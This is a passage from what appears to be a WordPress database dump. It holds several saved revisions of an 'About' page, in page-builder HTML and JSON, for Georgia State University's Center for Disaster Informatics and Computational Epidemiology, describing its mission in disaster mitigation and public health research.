h-heading style-324 style-local-122-c18 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c18\">\n <!---->\n <!---->\n <h3 class=\"\">Our Mission</h3>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c19\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c19 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c20-outer\">\n <div data-colibri-id=\"122-c20\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-319 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c5\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c6\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c13\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-03-31 23:37:54','2022-04-01 03:37:54','',122,'https://gsudice.dataconn.net/?p=928',0,'revision','',0),(935,1,'2022-03-31 23:40:07','2022-04-01 03:40:07','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c8\",\"parentId\":\"122-c7\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c7\",\"parentId\":\"122-c6\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c2\",\"index\":0,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c11\",\"index\":1,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c11\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c15\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-03-31 23:40:07','2022-04-01 03:40:07','',353,'https://gsudice.dataconn.net/?p=935',0,'revision','',0),(936,1,'2022-03-31 23:40:07','2022-04-01 03:40:07','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-324 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c5\">\n <!---->\n <!---->\n <h3 class=\"\">Our Mission</h3>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c7-outer\">\n <div data-colibri-id=\"122-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c8\" class=\"h-text h-text-component style-319 style-local-122-c8 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-288 style-local-122-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c12\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-289 style-local-122-c13 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c13\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-290 style-local-122-c14 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c15-outer\">\n <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c15 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c20\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-03-31 23:40:07','2022-04-01 03:40:07','',122,'https://gsudice.dataconn.net/?p=936',0,'revision','',0),(944,1,'2022-04-08 11:39:15','2022-04-08 15:39:15','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c11\",\"index\":1,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c11\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c15\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c8\",\"parentId\":\"122-c7\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c7\",\"parentId\":\"122-c6\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c2\",\"index\":0,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-04-08 11:39:15','2022-04-08 15:39:15','',353,'https://gsudice.dataconn.net/?p=944',0,'revision','',0),(945,1,'2022-04-08 11:39:15','2022-04-08 15:39:15','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch 